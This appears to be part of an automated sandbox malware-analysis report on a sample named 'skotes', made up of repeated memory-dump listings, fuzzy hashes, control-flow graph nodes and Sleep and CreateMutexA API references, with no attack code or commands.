                                                                                                                                            • Associated: 00000001.00000002.1724723949.0000000000D60000.00000040.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                            • Associated: 00000001.00000002.1724742408.0000000000D71000.00000080.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                            • Associated: 00000001.00000002.1724755205.0000000000D72000.00000040.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                            • Associated: 00000001.00000002.1724768317.0000000000D7D000.00000080.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                            • Associated: 00000001.00000002.1724780728.0000000000D7E000.00000040.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                            • Associated: 00000001.00000002.1724780728.0000000000D9B000.00000040.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                            • Associated: 00000001.00000002.1724817804.0000000000DCD000.00000080.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                            • Associated: 00000001.00000002.1724831456.0000000000DCE000.00000040.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                            • Associated: 00000001.00000002.1724843697.0000000000DCF000.00000080.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                            • Associated: 00000001.00000002.1724856756.0000000000DD5000.00000040.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                            • Associated: 00000001.00000002.1724872262.0000000000DD7000.00000080.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                            • Associated: 00000001.00000002.1724886778.0000000000DE4000.00000040.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                            • Associated: 00000001.00000002.1724899881.0000000000DE5000.00000080.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                            Joe Sandbox IDA Plugin
                                                                                                                                            • Snapshot File: hcaresult_1_2_ac0000_skotes.jbxd
                                                                                                                                            Yara matches
                                                                                                                                            Similarity
                                                                                                                                            • API ID: CreateMutexSleep
                                                                                                                                            • String ID:
                                                                                                                                            • API String ID: 1464230837-0
                                                                                                                                            • Opcode ID: bf8dac195e2e93ab1cd0ceb3e099ec869ce78ffc4d64cf97d45b0acfefea0048
                                                                                                                                            • Instruction ID: 7701a75171077d07374e1a2264c8b668e5f881ffbda876b6fd4cf3520c5a764d
                                                                                                                                            • Opcode Fuzzy Hash: bf8dac195e2e93ab1cd0ceb3e099ec869ce78ffc4d64cf97d45b0acfefea0048
                                                                                                                                            • Instruction Fuzzy Hash: A0314A31B001089BEB089BBCDD89FBDB7B2EB95318F24465DE414E73E1C73699818752

                                                                                                                                            Control-flow Graph

                                                                                                                                            • Executed
                                                                                                                                            • Not Executed
                                                                                                                                            control_flow_graph 124 aca418-aca438 128 aca43a-aca446 124->128 129 aca466-aca482 124->129 132 aca45c-aca463 call add663 128->132 133 aca448-aca456 128->133 130 aca484-aca490 129->130 131 aca4b0-aca4cf 129->131 134 aca4a6-aca4ad call add663 130->134 135 aca492-aca4a0 130->135 136 aca4fd-aca916 call ad80c0 131->136 137 aca4d1-aca4dd 131->137 132->129 133->132 138 aca93f-aca994 call af6c6a * 4 Sleep CreateMutexA 133->138 134->131 135->134 135->138 142 aca4df-aca4ed 137->142 143 aca4f3-aca4fa call add663 137->143 160 aca996-aca998 138->160 161 aca9a7-aca9a8 138->161 142->138 142->143 143->136 160->161 162 aca99a-aca9a5 160->162 162->161
                                                                                                                                            APIs
                                                                                                                                            • Sleep.KERNELBASE(00000064), ref: 00ACA963
                                                                                                                                            • CreateMutexA.KERNELBASE(00000000,00000000,00B23254), ref: 00ACA981
                                                                                                                                            Memory Dump Source
                                                                                                                                            • Source File: 00000001.00000002.1724017680.0000000000AC1000.00000040.00000001.01000000.00000007.sdmp, Offset: 00AC0000, based on PE: true
                                                                                                                                            • Associated: 00000001.00000002.1724002601.0000000000AC0000.00000004.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                            • Associated: 00000001.00000002.1724017680.0000000000B22000.00000040.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                            • Associated: 00000001.00000002.1724071809.0000000000B29000.00000008.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                            • Associated: 00000001.00000002.1724088724.0000000000B2B000.00000040.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                            • Associated: 00000001.00000002.1724108920.0000000000B35000.00000080.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                            • Associated: 00000001.00000002.1724124170.0000000000B36000.00000040.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                            • Associated: 00000001.00000002.1724140511.0000000000B37000.00000080.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                            • Associated: 00000001.00000002.1724253828.0000000000C98000.00000040.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                            • Associated: 00000001.00000002.1724278346.0000000000C9B000.00000080.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                            • Associated: 00000001.00000002.1724303378.0000000000CB0000.00000040.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                            • Associated: 00000001.00000002.1724303378.0000000000CBE000.00000040.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                            • Associated: 00000001.00000002.1724337006.0000000000CC3000.00000080.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                            • Associated: 00000001.00000002.1724352685.0000000000CC4000.00000040.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                            • Associated: 00000001.00000002.1724367357.0000000000CC6000.00000080.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                            • Associated: 00000001.00000002.1724385048.0000000000CC7000.00000040.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                            • Associated: 00000001.00000002.1724401972.0000000000CC8000.00000080.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                            • Associated: 00000001.00000002.1724417017.0000000000CC9000.00000040.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                            • Associated: 00000001.00000002.1724437449.0000000000CE4000.00000080.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                            • Associated: 00000001.00000002.1724453437.0000000000CE5000.00000040.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                            • Associated: 00000001.00000002.1724470582.0000000000CEE000.00000080.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                            • Associated: 00000001.00000002.1724485673.0000000000CEF000.00000040.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                            • Associated: 00000001.00000002.1724502899.0000000000CF1000.00000080.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                            • Associated: 00000001.00000002.1724522536.0000000000D04000.00000040.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                            • Associated: 00000001.00000002.1724542261.0000000000D1C000.00000080.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                            • Associated: 00000001.00000002.1724557646.0000000000D21000.00000040.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                            • Associated: 00000001.00000002.1724570203.0000000000D22000.00000080.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                            • Associated: 00000001.00000002.1724582604.0000000000D25000.00000040.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                            • Associated: 00000001.00000002.1724596300.0000000000D2E000.00000080.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                            • Associated: 00000001.00000002.1724609519.0000000000D34000.00000040.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                            • Associated: 00000001.00000002.1724625914.0000000000D35000.00000080.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                            • Associated: 00000001.00000002.1724638543.0000000000D37000.00000040.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                            • Associated: 00000001.00000002.1724655369.0000000000D4F000.00000080.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                            • Associated: 00000001.00000002.1724670325.0000000000D53000.00000040.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                            • Associated: 00000001.00000002.1724683020.0000000000D54000.00000080.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                            • Associated: 00000001.00000002.1724696048.0000000000D57000.00000040.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                            • Associated: 00000001.00000002.1724710174.0000000000D58000.00000080.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                            • Associated: 00000001.00000002.1724723949.0000000000D60000.00000040.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                            • Associated: 00000001.00000002.1724742408.0000000000D71000.00000080.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                            • Associated: 00000001.00000002.1724755205.0000000000D72000.00000040.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                            • Associated: 00000001.00000002.1724768317.0000000000D7D000.00000080.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                            • Associated: 00000001.00000002.1724780728.0000000000D7E000.00000040.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                            • Associated: 00000001.00000002.1724780728.0000000000D9B000.00000040.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                            • Associated: 00000001.00000002.1724817804.0000000000DCD000.00000080.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                            • Associated: 00000001.00000002.1724831456.0000000000DCE000.00000040.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                            • Associated: 00000001.00000002.1724843697.0000000000DCF000.00000080.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                            • Associated: 00000001.00000002.1724856756.0000000000DD5000.00000040.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                            • Associated: 00000001.00000002.1724872262.0000000000DD7000.00000080.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                            • Associated: 00000001.00000002.1724886778.0000000000DE4000.00000040.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                            • Associated: 00000001.00000002.1724899881.0000000000DE5000.00000080.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                            Joe Sandbox IDA Plugin
                                                                                                                                            • Snapshot File: hcaresult_1_2_ac0000_skotes.jbxd
                                                                                                                                            Yara matches
                                                                                                                                            Similarity
                                                                                                                                            • API ID: CreateMutexSleep
                                                                                                                                            • String ID:
                                                                                                                                            • API String ID: 1464230837-0
                                                                                                                                            • Opcode ID: e898fa7d242cefa715268463fbc4930e5553fa43a1552ff22db29c2c481bbd53
                                                                                                                                            • Instruction ID: 7a6bf294d7c71b00dcf977c4db0100891ae6e3c52e8ba81af92f9dde50fc3c2b
                                                                                                                                            • Opcode Fuzzy Hash: e898fa7d242cefa715268463fbc4930e5553fa43a1552ff22db29c2c481bbd53
                                                                                                                                            • Instruction Fuzzy Hash: C8314831B001089BEB0CABB8DE89F7DB7B2EF91318F20425CE415E73D5C77599818652

                                                                                                                                            Control-flow Graph

                                                                                                                                            • Executed
                                                                                                                                            • Not Executed
                                                                                                                                            control_flow_graph 164 aca54d-aca56d 168 aca56f-aca57b 164->168 169 aca59b-aca5b7 164->169 170 aca57d-aca58b 168->170 171 aca591-aca598 call add663 168->171 172 aca5b9-aca5c5 169->172 173 aca5e5-aca604 169->173 170->171 174 aca944-aca994 call af6c6a * 3 Sleep CreateMutexA 170->174 171->169 176 aca5db-aca5e2 call add663 172->176 177 aca5c7-aca5d5 172->177 178 aca606-aca612 173->178 179 aca632-aca916 call ad80c0 173->179 198 aca996-aca998 174->198 199 aca9a7-aca9a8 174->199 176->173 177->174 177->176 184 aca628-aca62f call add663 178->184 185 aca614-aca622 178->185 184->179 185->174 185->184 198->199 200 aca99a-aca9a5 198->200 200->199
                                                                                                                                            APIs
                                                                                                                                            • Sleep.KERNELBASE(00000064), ref: 00ACA963
                                                                                                                                            • CreateMutexA.KERNELBASE(00000000,00000000,00B23254), ref: 00ACA981
                                                                                                                                            Memory Dump Source
                                                                                                                                            • Source File: 00000001.00000002.1724017680.0000000000AC1000.00000040.00000001.01000000.00000007.sdmp, Offset: 00AC0000, based on PE: true
                                                                                                                                            • Associated: 00000001.00000002.1724002601.0000000000AC0000.00000004.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                            • Associated: 00000001.00000002.1724017680.0000000000B22000.00000040.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                            • Associated: 00000001.00000002.1724071809.0000000000B29000.00000008.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                            • Associated: 00000001.00000002.1724088724.0000000000B2B000.00000040.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                            • Associated: 00000001.00000002.1724108920.0000000000B35000.00000080.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                            • Associated: 00000001.00000002.1724124170.0000000000B36000.00000040.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                            • Associated: 00000001.00000002.1724140511.0000000000B37000.00000080.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                            • Associated: 00000001.00000002.1724253828.0000000000C98000.00000040.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                            • Associated: 00000001.00000002.1724278346.0000000000C9B000.00000080.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                            • Associated: 00000001.00000002.1724303378.0000000000CB0000.00000040.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                            • Associated: 00000001.00000002.1724303378.0000000000CBE000.00000040.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                            • Associated: 00000001.00000002.1724337006.0000000000CC3000.00000080.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                            • Associated: 00000001.00000002.1724352685.0000000000CC4000.00000040.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                            • Associated: 00000001.00000002.1724367357.0000000000CC6000.00000080.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                            • Associated: 00000001.00000002.1724385048.0000000000CC7000.00000040.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                            • Associated: 00000001.00000002.1724401972.0000000000CC8000.00000080.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                            • Associated: 00000001.00000002.1724417017.0000000000CC9000.00000040.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                            • Associated: 00000001.00000002.1724437449.0000000000CE4000.00000080.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                            • Associated: 00000001.00000002.1724453437.0000000000CE5000.00000040.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                            • Associated: 00000001.00000002.1724470582.0000000000CEE000.00000080.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                            • Associated: 00000001.00000002.1724485673.0000000000CEF000.00000040.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                            • Associated: 00000001.00000002.1724502899.0000000000CF1000.00000080.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                            • Associated: 00000001.00000002.1724522536.0000000000D04000.00000040.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                            • Associated: 00000001.00000002.1724542261.0000000000D1C000.00000080.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                            • Associated: 00000001.00000002.1724557646.0000000000D21000.00000040.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                            • Associated: 00000001.00000002.1724570203.0000000000D22000.00000080.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                            • Associated: 00000001.00000002.1724582604.0000000000D25000.00000040.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                            • Associated: 00000001.00000002.1724596300.0000000000D2E000.00000080.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                            • Associated: 00000001.00000002.1724609519.0000000000D34000.00000040.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                            • Associated: 00000001.00000002.1724625914.0000000000D35000.00000080.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                            • Associated: 00000001.00000002.1724638543.0000000000D37000.00000040.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                            • Associated: 00000001.00000002.1724655369.0000000000D4F000.00000080.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                            • Associated: 00000001.00000002.1724670325.0000000000D53000.00000040.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                            • Associated: 00000001.00000002.1724683020.0000000000D54000.00000080.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                            • Associated: 00000001.00000002.1724696048.0000000000D57000.00000040.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                            • Associated: 00000001.00000002.1724710174.0000000000D58000.00000080.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                            • Associated: 00000001.00000002.1724723949.0000000000D60000.00000040.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                            • Associated: 00000001.00000002.1724742408.0000000000D71000.00000080.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                            • Associated: 00000001.00000002.1724755205.0000000000D72000.00000040.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                            • Associated: 00000001.00000002.1724768317.0000000000D7D000.00000080.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                            • Associated: 00000001.00000002.1724780728.0000000000D7E000.00000040.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                            • Associated: 00000001.00000002.1724780728.0000000000D9B000.00000040.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                            • Associated: 00000001.00000002.1724817804.0000000000DCD000.00000080.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                            • Associated: 00000001.00000002.1724831456.0000000000DCE000.00000040.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                            • Associated: 00000001.00000002.1724843697.0000000000DCF000.00000080.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                            • Associated: 00000001.00000002.1724856756.0000000000DD5000.00000040.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                            • Associated: 00000001.00000002.1724872262.0000000000DD7000.00000080.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                            • Associated: 00000001.00000002.1724886778.0000000000DE4000.00000040.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                            • Associated: 00000001.00000002.1724899881.0000000000DE5000.00000080.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                            Joe Sandbox IDA Plugin
                                                                                                                                            • Snapshot File: hcaresult_1_2_ac0000_skotes.jbxd
                                                                                                                                            Yara matches
                                                                                                                                            Similarity
                                                                                                                                            • API ID: CreateMutexSleep
                                                                                                                                            • String ID:
                                                                                                                                            • API String ID: 1464230837-0
                                                                                                                                            • Opcode ID: b77c29e5dee1d629a04ff088279afd4805f91d20c06af9337641164de20895d4
                                                                                                                                            • Instruction ID: a7d618b6ca32359dc9d2970a5e633981e51acab233a6140e066abecbd981a7cd
                                                                                                                                            • Opcode Fuzzy Hash: b77c29e5dee1d629a04ff088279afd4805f91d20c06af9337641164de20895d4
                                                                                                                                            • Instruction Fuzzy Hash: 6C312A31B001088BEB08DBB8DD89F7DB761EB95718F24865CE415E73D5CB3999818752

                                                                                                                                            Control-flow Graph

                                                                                                                                            • Executed
                                                                                                                                            • Not Executed
                                                                                                                                            control_flow_graph 202 aca682-aca6a2 206 aca6a4-aca6b0 202->206 207 aca6d0-aca6ec 202->207 208 aca6c6-aca6cd call add663 206->208 209 aca6b2-aca6c0 206->209 210 aca6ee-aca6fa 207->210 211 aca71a-aca739 207->211 208->207 209->208 212 aca949-aca994 call af6c6a * 2 Sleep CreateMutexA 209->212 214 aca6fc-aca70a 210->214 215 aca710-aca717 call add663 210->215 216 aca73b-aca747 211->216 217 aca767-aca916 call ad80c0 211->217 234 aca996-aca998 212->234 235 aca9a7-aca9a8 212->235 214->212 214->215 215->211 218 aca75d-aca764 call add663 216->218 219 aca749-aca757 216->219 218->217 219->212 219->218 234->235 236 aca99a-aca9a5 234->236 236->235
                                                                                                                                            APIs
                                                                                                                                            • Sleep.KERNELBASE(00000064), ref: 00ACA963
                                                                                                                                            • CreateMutexA.KERNELBASE(00000000,00000000,00B23254), ref: 00ACA981
                                                                                                                                            Memory Dump Source
                                                                                                                                            • Source File: 00000001.00000002.1724017680.0000000000AC1000.00000040.00000001.01000000.00000007.sdmp, Offset: 00AC0000, based on PE: true
                                                                                                                                            • Associated: 00000001.00000002.1724002601.0000000000AC0000.00000004.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                            • Associated: 00000001.00000002.1724017680.0000000000B22000.00000040.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                            • Associated: 00000001.00000002.1724071809.0000000000B29000.00000008.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                            • Associated: 00000001.00000002.1724088724.0000000000B2B000.00000040.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                            • Associated: 00000001.00000002.1724108920.0000000000B35000.00000080.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                            • Associated: 00000001.00000002.1724124170.0000000000B36000.00000040.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                            • Associated: 00000001.00000002.1724140511.0000000000B37000.00000080.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                            • Associated: 00000001.00000002.1724253828.0000000000C98000.00000040.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                            • Associated: 00000001.00000002.1724278346.0000000000C9B000.00000080.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                            • Associated: 00000001.00000002.1724303378.0000000000CB0000.00000040.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                            • Associated: 00000001.00000002.1724303378.0000000000CBE000.00000040.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                            • Associated: 00000001.00000002.1724337006.0000000000CC3000.00000080.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                            • Associated: 00000001.00000002.1724352685.0000000000CC4000.00000040.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                            • Associated: 00000001.00000002.1724367357.0000000000CC6000.00000080.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                            • Associated: 00000001.00000002.1724385048.0000000000CC7000.00000040.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                            • Associated: 00000001.00000002.1724401972.0000000000CC8000.00000080.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                            • Associated: 00000001.00000002.1724417017.0000000000CC9000.00000040.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                            • Associated: 00000001.00000002.1724437449.0000000000CE4000.00000080.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                            • Associated: 00000001.00000002.1724453437.0000000000CE5000.00000040.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                            • Associated: 00000001.00000002.1724470582.0000000000CEE000.00000080.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                            • Associated: 00000001.00000002.1724485673.0000000000CEF000.00000040.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                            • Associated: 00000001.00000002.1724502899.0000000000CF1000.00000080.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                            • Associated: 00000001.00000002.1724522536.0000000000D04000.00000040.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                            • Associated: 00000001.00000002.1724542261.0000000000D1C000.00000080.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                            • Associated: 00000001.00000002.1724557646.0000000000D21000.00000040.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                            • Associated: 00000001.00000002.1724570203.0000000000D22000.00000080.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                            • Associated: 00000001.00000002.1724582604.0000000000D25000.00000040.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                            • Associated: 00000001.00000002.1724596300.0000000000D2E000.00000080.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                            • Associated: 00000001.00000002.1724609519.0000000000D34000.00000040.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                            • Associated: 00000001.00000002.1724625914.0000000000D35000.00000080.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                            • Associated: 00000001.00000002.1724638543.0000000000D37000.00000040.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                            • Associated: 00000001.00000002.1724655369.0000000000D4F000.00000080.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                            • Associated: 00000001.00000002.1724670325.0000000000D53000.00000040.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                            • Associated: 00000001.00000002.1724683020.0000000000D54000.00000080.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                            • Associated: 00000001.00000002.1724696048.0000000000D57000.00000040.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                            • Associated: 00000001.00000002.1724710174.0000000000D58000.00000080.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                            • Associated: 00000001.00000002.1724723949.0000000000D60000.00000040.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                            • Associated: 00000001.00000002.1724742408.0000000000D71000.00000080.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                            • Associated: 00000001.00000002.1724755205.0000000000D72000.00000040.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                            • Associated: 00000001.00000002.1724768317.0000000000D7D000.00000080.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                            • Associated: 00000001.00000002.1724780728.0000000000D7E000.00000040.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                            • Associated: 00000001.00000002.1724780728.0000000000D9B000.00000040.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                            • Associated: 00000001.00000002.1724817804.0000000000DCD000.00000080.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                            • Associated: 00000001.00000002.1724831456.0000000000DCE000.00000040.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                            • Associated: 00000001.00000002.1724843697.0000000000DCF000.00000080.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                            • Associated: 00000001.00000002.1724856756.0000000000DD5000.00000040.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                            • Associated: 00000001.00000002.1724872262.0000000000DD7000.00000080.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                            • Associated: 00000001.00000002.1724886778.0000000000DE4000.00000040.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                            • Associated: 00000001.00000002.1724899881.0000000000DE5000.00000080.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                            Joe Sandbox IDA Plugin
                                                                                                                                            • Snapshot File: hcaresult_1_2_ac0000_skotes.jbxd
                                                                                                                                            Yara matches
                                                                                                                                            Similarity
                                                                                                                                            • API ID: CreateMutexSleep
                                                                                                                                            • String ID:
                                                                                                                                            • API String ID: 1464230837-0
                                                                                                                                            • Opcode ID: 0656edfb080b1b88cef2e9e95bc8aef49dc37f2146da55e74901a8da78fa907a
                                                                                                                                            • Instruction ID: eab312d6fbb39d4b44f026cb99c15bbb6b57d698742e6ce7023f084553da7519
                                                                                                                                            • Opcode Fuzzy Hash: 0656edfb080b1b88cef2e9e95bc8aef49dc37f2146da55e74901a8da78fa907a
                                                                                                                                            • Instruction Fuzzy Hash: F3314831B002088BEB08DBB8DD89F7DB7B2EB95318F24865CE419E73D1C73999818752

                                                                                                                                            Control-flow Graph

                                                                                                                                            • Executed
                                                                                                                                            • Not Executed
                                                                                                                                            control_flow_graph 238 ac9adc-ac9ae8 239 ac9afe-ac9d91 call add663 call ad7a00 call ac5c10 call ac8b30 call ad8220 call ad7a00 call ac5c10 call ac8b30 call ad8220 238->239 240 ac9aea-ac9af8 238->240 240->239 241 aca917 240->241 243 aca953-aca994 Sleep CreateMutexA 241->243 244 aca917 call af6c6a 241->244 250 aca996-aca998 243->250 251 aca9a7-aca9a8 243->251 244->243 250->251 253 aca99a-aca9a5 250->253 253->251
                                                                                                                                            APIs
                                                                                                                                            • Sleep.KERNELBASE(00000064), ref: 00ACA963
                                                                                                                                            • CreateMutexA.KERNELBASE(00000000,00000000,00B23254), ref: 00ACA981
                                                                                                                                            Memory Dump Source
                                                                                                                                            • Source File: 00000001.00000002.1724017680.0000000000AC1000.00000040.00000001.01000000.00000007.sdmp, Offset: 00AC0000, based on PE: true
                                                                                                                                            • Associated: 00000001.00000002.1724002601.0000000000AC0000.00000004.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                            • Associated: 00000001.00000002.1724017680.0000000000B22000.00000040.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                            • Associated: 00000001.00000002.1724071809.0000000000B29000.00000008.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                            • Associated: 00000001.00000002.1724088724.0000000000B2B000.00000040.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                            • Associated: 00000001.00000002.1724108920.0000000000B35000.00000080.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                            • Associated: 00000001.00000002.1724124170.0000000000B36000.00000040.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                            • Associated: 00000001.00000002.1724140511.0000000000B37000.00000080.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                            • Associated: 00000001.00000002.1724253828.0000000000C98000.00000040.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                            • Associated: 00000001.00000002.1724278346.0000000000C9B000.00000080.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                            • Associated: 00000001.00000002.1724303378.0000000000CB0000.00000040.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                            • Associated: 00000001.00000002.1724303378.0000000000CBE000.00000040.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                            • Associated: 00000001.00000002.1724337006.0000000000CC3000.00000080.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                            • Associated: 00000001.00000002.1724352685.0000000000CC4000.00000040.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                            • Associated: 00000001.00000002.1724367357.0000000000CC6000.00000080.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                            • Associated: 00000001.00000002.1724385048.0000000000CC7000.00000040.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                            • Associated: 00000001.00000002.1724401972.0000000000CC8000.00000080.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                            • Associated: 00000001.00000002.1724417017.0000000000CC9000.00000040.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                            • Associated: 00000001.00000002.1724437449.0000000000CE4000.00000080.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                            • Associated: 00000001.00000002.1724453437.0000000000CE5000.00000040.00000001.01000000.00000007.sdmpDownload File
